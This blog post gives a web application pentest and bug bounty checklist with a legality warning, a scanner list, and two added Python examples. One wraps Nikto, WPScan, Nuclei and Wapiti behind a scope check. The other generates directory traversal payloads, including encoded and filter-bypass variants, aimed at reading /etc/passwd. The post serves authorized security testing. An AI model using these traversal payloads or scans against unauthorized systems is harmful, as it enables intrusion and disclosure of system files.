David Lee

Web Application Pentest/ Bug Bounty Checklist & Methodology

OK, so you want to start pentesting websites or doing bug bounties against web applications, but where do you start? This is the perfect blog just for you!


Please Keep In Mind

Before we go in guns blazing on pentest methodology and the tools you can use, it's important to understand the legality of what you're about to do. Unless you have explicit approval from the owner of the website, or the website/business is listed on one of the various bug bounty platforms and your target falls within its published scope (worth reading up on scopes), you should absolutely not run any scans against their web application. I have to write this in here to cover myself, unfortunately, just in case there's a sticky situation where someone says "DC SAID I COULD DO IT AND THAT MAKES IT LEGAL!"


Don't do it without authorization - it's that simple.


OK, let's get onto the fun stuff!


Operating System

Any operating system will do, honestly, but in my example I used WSL2 Ubuntu on a Windows 11 system. Is it perfect? No. Does it work? Yep! I'd recommend using something purpose-built though, like Kali Linux, Parrot or even BlackArch, for those of you who use Arch btw.

Weirdly, running neofetch shows that I'm using Windows 10, but I assure you, it's actually Windows 11.



Tools

Nikto (web server scanner: outdated server software, dangerous files, misconfigurations)

WPScan (WordPress scanner: core/plugin/theme versions, user enumeration)

Nuclei (template-based scanner for known vulnerabilities and misconfigurations)

Wapiti 3 (black-box web application vulnerability scanner: XSS, SQLi, file inclusion and more)
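Because "stay in scope" is the rule that matters most, here is how I would wrap the four tools above so a typo in the target URL can never fire a scan at somebody else's site. This is an added example, not a script from the post: it assumes the in-scope hostnames are copied from the engagement agreement or programme page into `IN_SCOPE`, that the scanners are on PATH, and uses only the tools' basic documented flags (`nikto -h`, `wpscan --url/--enumerate`, `nuclei -u/-severity`, `wapiti -u/--scope/-m`).

```python
"""Scope-gated wrapper for Nikto, WPScan, Nuclei and Wapiti (added example)."""
import subprocess
from urllib.parse import urlparse

# Constructed scope for the example; in a real engagement copy the real list
# from your SoW or the bug bounty programme page.
IN_SCOPE = {"app.example.com", "www.example.com"}


def in_scope(url: str, scope=IN_SCOPE) -> bool:
    """Exact-hostname match only: a sibling or child subdomain is NOT in scope
    unless it is listed, which is how most programmes word their scope."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    return parsed.hostname.lower() in scope


def build_commands(url: str) -> list[list[str]]:
    """Return the argv for each scanner, refusing out-of-scope targets up front."""
    if not in_scope(url):
        raise ValueError(f"refusing to scan out-of-scope target: {url}")
    host = urlparse(url).hostname
    return [
        # Nikto: -h target, -o write the report to a file
        ["nikto", "-h", url, "-o", f"nikto-{host}.txt"],
        # WPScan: enumerate vulnerable plugins, vulnerable themes and users
        ["wpscan", "--url", url, "--enumerate", "vp,vt,u"],
        # Nuclei: only templates rated medium or above, to keep the noise down
        ["nuclei", "-u", url, "-severity", "medium,high,critical"],
        # Wapiti: crawl the whole domain, run a handful of injection modules
        ["wapiti", "-u", url, "--scope", "domain", "-m", "xss,sql,exec,file"],
    ]


def run_scans(url: str, dry_run: bool = True) -> list[str]:
    """With dry_run=True just return the command lines; False executes them."""
    lines = []
    for argv in build_commands(url):
        lines.append(" ".join(argv))
        if not dry_run:
            # check=False: one scanner failing should not abort the others.
            subprocess.run(argv, check=False)
    return lines


if __name__ == "__main__":
    for line in run_scans("https://app.example.com"):
        print(line)
```

Run it once with `dry_run=True` and read the printed commands before you let it execute anything; the scope check is deliberately strict (exact hostname, http/https only) because being too permissive here is how people end up scanning a provider's shared infrastructure instead of the target.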



Methodology & Checklist

Below are some checklist items I make sure to mark off when completing a web app pentest or undertaking any bug bounties. Keep in mind that the tools to be used really depend on the services you're testing against, as well as what's in scope (always stay in scope, ladies and gents!).


  • [ ] Conduct search engine reconnaissance for information leakage (indexed documents, cached pages, error messages)

  • [ ] Retrieve and review robots.txt (and sitemap.xml); the disallowed paths are the first places to look

  • [ ] Review the content of web pages (HTML comments, hidden form fields, metadata)

  • [ ] Fingerprint software versions, database details and verbose technical error pages or coding errors by requesting invalid pages

  • [ ] Examine the configuration of the network infrastructure (reverse proxies, load balancers, CDN, exposed management ports)

  • [ ] Analyze the front-end source code (HTML, JavaScript) of the pages you access for endpoints, keys and client-side logic

  • [ ] Test for sensitive information exposed through file extensions (.bak, .old, .sql, .zip, .env and similar left in the webroot)

  • [ ] Check whether a CAPTCHA is present and whether its absence or weak implementation exposes authentication vulnerabilities (brute force, user enumeration)

  • [ ] Cloud storage test (misconfigured buckets or blobs referenced by the application)

  • [ ] Test manipulation of roles and privileges to access resources (horizontal and vertical privilege escalation, IDOR)

  • [ ] Check cryptography and error handling

  • [ ] Check that session identifiers are protected: sent only over TLS, carried in cookies with the right flags, never exposed in URLs or page source

  • [ ] Data validation testing (injection and other input-handling flaws)

  • [ ] Conduct a directory traversal attack to read files or execute commands outside the web server's document root

  • [ ] Run a vulnerability scanner such as HP WebInspect or Evolve to identify vulnerabilities and decide whether they are actually exploitable

  • [ ] Conduct a MITM (man-in-the-middle) test by intercepting communications between end users and the web server to see whether confidential information is exposed (e.g. TLS not enforced, mixed content)
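Three of the items above (robots.txt review, sensitive file extensions, directory traversal) are easy to turn into a small helper you run against captured responses. The code below is an added example, not from the post; the robots.txt body and the "server response" are constructed inline so it runs offline, and the extension list and traversal variants are my own choices rather than anything the post prescribes.

```python
"""Helpers for three checklist items: robots.txt review, sensitive file
extensions, and directory traversal payloads/detection (added example)."""
import re
from urllib.parse import quote, urljoin

# Constructed robots.txt, like what `curl https://target/robots.txt` might return.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/db_dump.sql
Disallow: /old/config.php.bak   # someone "hid" this instead of deleting it
Allow: /
Sitemap: https://app.example.com/sitemap.xml
"""

# Extensions that commonly leak source, credentials or data when left in the webroot
# (my list; extend it for the stack you are testing).
SENSITIVE_EXTENSIONS = (".bak", ".old", ".orig", ".sql", ".zip", ".tar.gz",
                        ".env", ".log", ".swp", ".config", ".inc")


def parse_robots(text: str) -> dict[str, list[str]]:
    """Return the Disallow / Allow / Sitemap entries of a robots.txt body."""
    out = {"disallow": [], "allow": [], "sitemap": []}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        key, _, value = line.partition(":")       # first colon only: URLs contain ':'
        key, value = key.strip().lower(), value.strip()
        if key in out and value:
            out[key].append(value)
    return out


def sensitive_paths(paths: list[str]) -> list[str]:
    """Flag paths whose extension suggests a backup, dump or config artifact."""
    return [p for p in paths if p.lower().endswith(SENSITIVE_EXTENSIONS)]


def candidate_urls(base: str, robots: dict[str, list[str]]) -> list[str]:
    """Disallowed entries are exactly the URLs worth requesting by hand (in scope!)."""
    return [urljoin(base, p) for p in robots["disallow"]]


def traversal_payloads(target_file: str = "etc/passwd", depth: int = 6) -> list[str]:
    """Variants of ../ to send to a file-reading parameter. Each one decodes to
    the same path, but naive filters often only catch the first form."""
    dots = "../" * depth
    return [
        dots + target_file,                                   # plain
        quote(dots, safe="") + target_file,                   # ..%2F  (slash encoded)
        quote(quote(dots, safe=""), safe="") + target_file,   # ..%252F (double encoded)
        dots.replace("../", "....//") + target_file,          # survives a non-recursive "../" strip
        "/" + target_file,                                    # absolute path, no root prefix
    ]


# A Unix passwd file starts with the root entry; that line is the success signal.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)


def looks_like_passwd(body: str) -> bool:
    """True if a response body contains the root entry of /etc/passwd."""
    return bool(PASSWD_RE.search(body))


if __name__ == "__main__":
    robots = parse_robots(SAMPLE_ROBOTS)
    print("disallowed:", robots["disallow"])
    print("worth a closer look:", sensitive_paths(robots["disallow"]))
    print("to request manually:", candidate_urls("https://app.example.com", robots))
    for p in traversal_payloads():
        print("try ?file=" + p)
    # Constructed response body standing in for a real server reply.
    print("traversal hit:", looks_like_passwd("root:x:0:0:root:/root:/bin/bash\n"))
```

The traversal list goes beyond the single case in the checklist on purpose: a finding that only works with the plain `../` form is usually a filter problem, and the encoded and `....//` variants are what tell you whether the filter is recursive and whether decoding happens before or after it.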



Wrap-Up

So to wrap this little post up nicely, the tools, methodologies and technologies used here are mostly personal preference. I don't pretend to know everything, this is just how I do things, and I'm 99% sure there are better ways that suit your situation, so take what I say here with a grain of salt and learn to hack all the things your way!


